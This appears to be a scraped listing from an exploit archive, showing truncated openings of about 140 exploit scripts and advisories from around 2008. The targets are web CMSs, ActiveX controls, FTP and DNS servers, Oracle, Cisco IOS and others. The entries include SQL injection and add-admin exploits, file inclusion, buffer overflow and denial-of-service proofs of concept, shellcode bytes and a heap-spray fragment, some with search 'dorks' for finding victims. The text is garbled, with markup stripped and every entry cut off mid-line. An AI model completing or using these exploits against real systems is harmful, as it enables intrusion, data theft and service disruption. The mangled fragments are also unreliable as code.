-----------------------------------------------------------------------------BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Executionurl: http://www.burnaware.com...
#!/usr/bin/perl# ----------------------------------------------------------# iGaming = 1.5 Multiple Remote SQL Injection Exploit# Perl Exploit - Output: id:admin:password# Discovere...
#!/usr/bin/perl -w# Rianxosencabos CMS 0.9 Remote Add Admin Exploit# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz# written by ka0x ka0x01 [at] gmail [dot] com# D....
#!/usr/bin/perl## CJ Ultra Plus = v1.0.4 Cookie SQL Injection## found and coded by -SmoG- /GermAn hAckZ0r# contact: ICQ - 266836394# # # ## hints: - sometimes the parameter SID is d...
#!/usr/bin/env python# ### OOO OOO OO OOO # O O O O O# O O O O O# O...
////////////////////////////////////////////////////////////////////////////////////// ---------------------------------------------------------------------------- //// |...
/*Debian Sarge Multiple IMAP Server DoS (debianimapers.c)Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]Testing Cyrus IMAPd:bash$ ./debianimapers 192.168.0.189.......
?phperror_reporting(E_ALL);//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IPB = 2.3...
htmlpre=============================================================================MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow =========================...
/**** The Personal FTP Server 6.0f RETR DOS exploit ***A vulnerability exists in the way Personal FTP Server handlesmultiple RETR commands with overly long filenames.When confronted...
#!/usr/bin/perluse LWP::UserAgent;use HTTP::Request;# ------------------------------------------------------------------------------------------------- -## Yourownbux v4.0 ---------...
?phpini_set(max_execution_time,0);print_r(################################################################# pLink 2.07 - Blind SQL Injection Exploit #...
#################################################################################################################### Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Forma...
#!/usr/bin/python# --------------------------------------------------------------# EO Video v1.36 Heap Overflow local PoC/DoS exploit# *.eop playlist file in Name buffer overflow# O...
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1- - Orange Bat advisory -Name : ESET Smart Security 3.0.667.0Class : Privilage escalationPublished : 2008-08-14Credit : g_ (g_ # orange-b...
#!/usr/bin/perl -W# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit# File affected: include/draw-delete.php (id)# Vuln Code:# 06: $did = $_GET['id'];# 08: mysql_query(DELETE...
#!/usr/bin/perl#----------------------------------------------------------------##Script : PhsBlog v0.2##Type : Bypass Sql injection Filtering Exploit##Method : GET##Risk : High##--...
#!/usr/bin/perl#----------------------------------------------------------------##Script : Ezphotogallery 2.1##Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Explo...
!--Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoCSummary: Maxthon Browser is a powerful tabbed browser built forall users. Besides basic browsing functionality, Maxt...
#!/usr/bin/python######################################################################################### minb Remote Code Execution Exploit #######################################...
!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista I can't seem to reproduce this on XP! Oh well. Of course the m...
#!/usr/bin/php?php# ------------------------------------------------------------# quick'n'dirty wordpress admin-take0ver poc# by iso^kpsbr in august 2oo8 ## works w/ wordpress 2.6.1...
############################################################################## Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar ######## updates in http://felipe.andres.manzano.goo...
#include stdio.h#include stdlib.h/*DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 EnglishSecurityFocus Advisory:Download Accelerator Plus (DAP) is prone to a buffer-overflow vulne...
;-------------------------------------------------------------------------;; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability; PoC (probably older versions a...
#!/usr/bin/python# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit# Bug discovered by Krystian Kloskowski (h07) h07@interia.pl# Tested on: Download Acce...
########################################################### PICS BUILDER (page) SQL Injection Vulnerability#========================================================# Author: Hussin ...
# Name Of Script : Ray# Version : 3.5# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]# My Home Page : WwW.4RxH.CoM [ We Will...
#!/usr/bin/perl# k1tk4t Public Security Advisory# ////////////////////////////////////////////////////////////# AuraCMS = 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halam...
------------------------------------------------------------------------------------------- Joomla Component com_content SQL Injection Vulnerabity ------------------...
-[*] ================================================================================ [*]--[*] Last Minute Script = 4.0 Remote SQL Injection Vulnerability [*]--[*] =================...
#!/usr/bin/perl#=================================================# BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit#=================================================## ,--^----------...
# Name Of Script : Dolphin PHP# Version : 6.1.2# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip# Found By : RoMaNcYxHaCkEr [ Ro...
#!/usr/bin/perl -w# Jean-Michel BESNARD - LEXSI Audit# 2008-07-08# perl trixbox_fi.pl 192.168.1.212# Please listen carefully as our menu option has changed# Choose from the followin...
-[*] ================================================================================ [*]--[*] Real Estate Script = 1.1 Remote SQL Injection Vulnerability [*]--[*] =================...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;## [!] Discovered.: DNX# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org# [!] Detected...: 29.06.2008# [!...
#!/usr/bin/perl## quickbite.pl## Safari Quicktime = 7.3 RTSP Content-Type overflow exploit# for Mac OS X (Intel)## Tested with OS X 10.4.# On victim, browse to http://server:8080/# ...
-[*] ================================================================================ [*]--[*] Maian Uploader = v4.0 Insecure Cookie Handling Vulnerability [*]--[*] ================...
-[*] ================================================================================ [*]--[*] Maian Search = v1.1 Insecure Cookie Handling Vulnerability [*]--[*] ==================...
-[*] ================================================================================ [*]--[*] Maian Weblog = v4.0 Insecure Cookie Handling Vulnerability [*]--[*] ==================...
-[*] ================================================================================ [*]--[*] Maian Guestbook = 3.2 Insecure Cookie Handling Vulnerability [*]--[*] ================...
-[*] ================================================================================ [*]--[*] Maian Recipe = v1.2 Insecure Cookie Handling Vulnerability [*]--[*] ==================...
?php#### Name: Fuzzylime 3.01 Remote Code Execution Exploit## Credits: Charles real F. charlesfol[at]hotmail.fr#### Conditions: None#### Greetz: Inphex, hEEGy and austeN#### Exp...
--== ================================================================================ ==----== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==----== ===========================...
==================================================================== Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability================================================...
################################################################################### Viva IslaM Viva IslaM ######################## Remote SQL injection Vulnerability#### tplSoccerSi...
/* Exploiting Microsoft DNS Dynamic Updates for Fun and profit Andres Tarasco Acu?a - (c) 2007 Url: http://www.514.es By default, most Microsoft DNS servers integrated with active d...
/--------------------------------------------------------------- // Joomla Component DT Register Remote SQL injection /---------------------------------...
|___________________________________________________|||AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability||___________________________________________________...
################################################################################### Viva IslaM Viva IslaM ######################## Remote SQL InjEcti0n Vulnerability#### WebCMS Port...
#!/usr/bin/perl #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!#after i noticed that there was a problem changing $cmd,i fixed it.this is the result.#...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print ######################################################...
Author: SaimeDate: July 12, 2008Script: Maian Greetings v2.1 Insecure Cookie Handling VulnerabilityURL: http://www.maianscriptworld.co.ukDork: Powered by: Maian Greetings v2.1Descri...
Author: SaimeDate: July 12, 2008Script: Maian Music v1.0 Insecure Cookie Handling VulnerabilityURL: http://www.maianscriptworld.co.ukDork: Maian Music v1.0. Copyright 2007-2008 Maia...
Author: SaimeDate: July 12, 2008Script: Maian Events v2.0 Insecure Cookie Handling VulnerabilityURL: http://www.maianscriptworld.co.ukDork: Maian Events v2.0 Copyright 2005-2008 Mai...
Author: SaimeDate: July 12, 2008Script: Maian Gallery v2.0 Insecure Cookie Handling VulnerabilityURL: http://www.maianscriptworld.co.ukDork: Maian Gallery v2.0 Copyright 2006-2008 M...
################################################################### Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability##===================================================...
Author: SaimeDate: July 12, 2008Script: Maian Cart v1.1 Insecure Cookie Handling VulnerabilityURL: http://www.maianscriptworld.co.ukDork: Powered by Maian Cart v1.1Description:Maian...
#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it use IO::Socket::INET; use Switch; if (@ARGV new(proto='tcp'...
?php/*Coded By RMx - Liz0zimBiyoSecurity.Com Coderx.orgKi zava Ki Zava :)Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz*/error_reporting(E_ALL);ini_set(max_execution_time,...
################################################################################# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability# Author : cOndemned# Greetz : ZaBe...
================================================= MFORUM 0.1a Arbitrary Add-Admin Vulnerability================================================= ,--^----------,--------,-----,------...
######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## #### #### ## ## ## ## #### ## ## ## ##...
#!/usr/bin/perl #inphex#PHPizabi v0.848b C1 HFP1 Remote Code Execution#http://www.dz-secure.com/tools/1/WebESploit.pl.txt#if you are seeking for a partner to work on some project(s)...
vBulletin PhotoPost vBGallery v2.x Remote File UploadFound by : Cold z3roe-mail : exploiter@hackteach.orgHome page : www.Hack.ps==============================exploit usage : http://...
################################################################################### Viva IslaM Viva IslaM ######################## Remote SQL injection Vulnerability#### Hockeystats...
############################################################################################ # # # ...:::::Galatolo Web Manager 1.3a Insecure Cook...
###################################################### Author : BeyazKurt# Contact : Djm-sut@Hotmail.Com## Script : php Help Agent (v1.1 Full 1.0)# Risk : Local File Include# Downlo...
____________________ ___ ___ _________ _____/_ ___ / | \_____ | __)_ / // ~ / | | \ ___ Y / | /_______ / ______ /___|_ /_______ / / /...
In The Name Of GOD ------------------------------------------------------------- - [ Persian Boys Hacking Team ] -:- 2008 -...
--== ============================================================================ ==----== Galatolo Web Manager 1.3a = XSS / Remote SQL Injection Vulnerability ==-- --== ===========...
==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with register_globals = on) | Founded By rXh RoMaNTiC-TeaM ======...
------------------------------------------------------------------ Name : Bilboblog 2.1 Multiples Vulnerabilities Description : Bilboblog is a small application of micro-blogging in...
########################## www.BugReport.ir ########################### AmnPardaz Security Research Team## Title: Pluck Local File inclusion# Vendor: http://www.pluck-cms.org# Bug: ...
/***************************************************************************** * Microsoft Windows .doc File Malformed Pointers DoS * * * *...
?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //...
// ejecsploit.c - local root exploit for bsds eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrine and all the other netric guys!!! you rule :) #include ...
#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # # Tested on Oracle Database 10g Enterprise Edition Release 10...
## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing li...
#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for windows XP SP2 (polish version) was # provided. Thi...
/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw which may allow local users to steal data from the kerne...
#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.02900.2180 (SP2) # # Details: The response is broken into buffers...
#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystian Kloskowski (h07) h07@interia.pl # Tested on Win...
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense ...
!-- ----------------------------------------------------------------------------------------------------------- BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service...
// mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport(user32.dll)] unsafe public static extern int MessageBoxA(uint hwnd, byte* l...
/************************************************************************ *WFTPD server = 3.25 SITE ADMN DoS * * * *Sending comm...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#include stdio.h#include stdlib.h#include sys/socket.h#include sys/types.h#include netinet/in.h#include string.h#include malloc.h#include sys/stat.h#include f...
!--Document Imaging SDK Buffer Overflow Vulnerability DoS Proof of conceptAuthor: r0ut3rMail : writ3r [at] gmail.com------------------------------Tested on WinXP Pro SP2Version: 10....
Yahoo Messenger 8.1 (latest) Remote DoSSafe for Scripting, Safe for Initializehtmlbodyobject id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670/objectscript language=vbscr...
#!/usr/bin/perl# Simple DNS Plus 5.0/4.1 remote Denial of Service exploit## usage: sdns-dos.pl dns server dns source port num of packets# Exploit written by Exodus.# http://www.blac...
-----------------------------------------------------------------------------NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflowurl: http://www.nctsoft.com Author: shinnaimai...
#!/usr/bin/perl -wuse LWP::UserAgent;use MIME::Base64;use Digest::MD5 qw(md5_hex);use Getopt::Std; getopts(h:, %args);print #############################################n;print # Pl...
#include stdio.h #include string.h #include winsock.h #define VULNSERVER WAR-FTPD 1.65 #define VULNCMD x55x53x45x52x20 #define ZERO 'x00' #d...
#!/usr/bin/perl# k`sOSe - 7/21/2008# http://secunia.com/advisories/20172# A sploit for an ancient vuln. Just because i need # to improve my skills on windows explotation.use warning...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#!/usr/bin/python## _____ _ _ _____ _____ _____ _____# / ___| |_| | _ | _ | _ |_ _|# | (___| _ | [_)_/| (_) | (_) | | |# _____|_| |_|_| |_||_____|_____| |_|# C. H. R. O. O. T. SECUR...
#!/usr/bin/pythonOracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.Some...
htmlbodyobject id=targetclassid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F/objectscript language=vbscript arg1=String(10000, A) target.StartURL(arg1)/script<...
#/usr/bin/perl#| | Author: GoLd_M#--//--# -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --#--//-- Exploit :use strict;use LWP::Simple;print - - - - - - - - - - - - -...
#// Bea Weblogic -- Apache Connector Remote Exploit -1day#// Should stack break latest Windows Server 2003 address space randomization#// BIG THANKS TO #// dong-hun you(Xpl017Elz) i...
!-- Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploitwritten by e.b.Tested on Windows XP SP2(fully patched) English, IE6 IE7, OfficeScan 7.3 patch 4, Offi...
/** Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack** Compilation:* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm** Dependency: libdnet (aka li...
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovere...
a name=upload-file/ah2WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD/h2h3SaO/h3h4BiyoSecurityTeam || www.biyosecurity.com/h4iPlugin URI: http://...
from scapy import *import random# Copyright (C) 2008 Julien Desfossez ju@klipix.org# http://www.solisproject.net/## This program is free software; you can redistribute it and/or mod...
#!/usr/bin/perl#use warnings;use strict;# CMD=c:windowssystem32calc.exe# [*] x86/alpha_mixed succeeded, final size 344my $shellcode = xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a&...
____ ____ __ __ / / | | | | ----====####/ /__##/ / ##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======###### / /#| |##| |#|...
#!/usr/bin/perluse IO::Socket;print q{-----------------------------------------------Arctic Issue Tracker v2.0.0 exploit by ldma ~ SubCode ~use: arctic.pl [server] [dir]sample:$perl...
#!/usr/bin/perl# k`sOSe - 07/29/2008use warnings;use strict;# http://www.metasploit.com# EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe# [*] x86/shikata_ga_nai succeeded, final size 16...
#!/usr/bin/perl#/-----------------------------------------------#| /----------------------------------------- |#| | Remote SQL Exploit | |#| | eNdonesia 8.4 Remote SQL Exploit | |#|...
?php@session_start();?table align=center width=72% height=95% trtd?php/*HIOX Random Ad 1.3 Arbitrary Add Admin User Vulnerability[~] Discoverd exploited by Stack[~]Greeatz All...
?php@session_start();?table align=center width=72% height=95% trtd?php/*HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability [~] Discoverd exploited by Stack[~]G...
/*Cisco IOS FTP server remote exploit by Andy Davis 2008 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007...
#!/usr/bin/perl ###################################################################################### e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit ## ..::virangar secur...
# Author: __GiReX__ 26/07/08# Homepage: girex.altervista.org# CMS: IceBB = 1.0-RC9.2# Site: icebb.net# Bug: Blind SQL Injection# Exploit: Session Hijacking PoC# Works regardless of ...
/********************************************************************//* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] *//******************************************...
?php/*. vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit. download: http://www.quicksilverforums.com/.. author: irk4z[at]yahoo.pl. homepage: http://irk4z.word...
htmlbodyobject classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target //objectscript language=javascript// k`sOSe 08/08/2008// tested in IE6, XP SP1var shellcode = unescape(...
######################################################################################################gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability##################...
########################################################### phpDatingClub Local File Include Vulnerability#========================================================# =# Author: Big B...
########################################################### dreamnews ( rss) Remote SQL Injection Vulnerability#========================================================# Author: Hus...
####################################################################### Facebook Newsroom Application Remote File Inclusion Vulnerability############################################...
--== ========================================================= ==----== Wizi Wiki Wig Local File Inclusion Vulnerability ==----== ===================================================...
| File Store PRO 3.2 Blind SQL Injection ||________________________________________|Download from: http://upoint.info/cgi/demo/fs/filestore.zip- Need admin rights:/confirm.php:[code...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#!/usr/bin/perluse LWP::UserAgent;use Getopt::Long;if(!$ARGV[1]){ print n; print #################### Viva IslaMe Viva IslaMe #############...
#!/usr/bin/python# FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit# Bug discovered by Krystian Kloskowski (h07) h07@interia.pl# Testen on: FlashGet 1.9 / XP ...
var body=OBJECT CLASSID=CLSID:C932BA85-4374-101B-A56C-00AA003668DC width=10PARAM NAME=Mask VALUE=;var body1=/OBJECT;var buf=;...
/****** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.**** Based on exploit by Koshi (written in Perl). This one should be more** stable. Just for fun and t...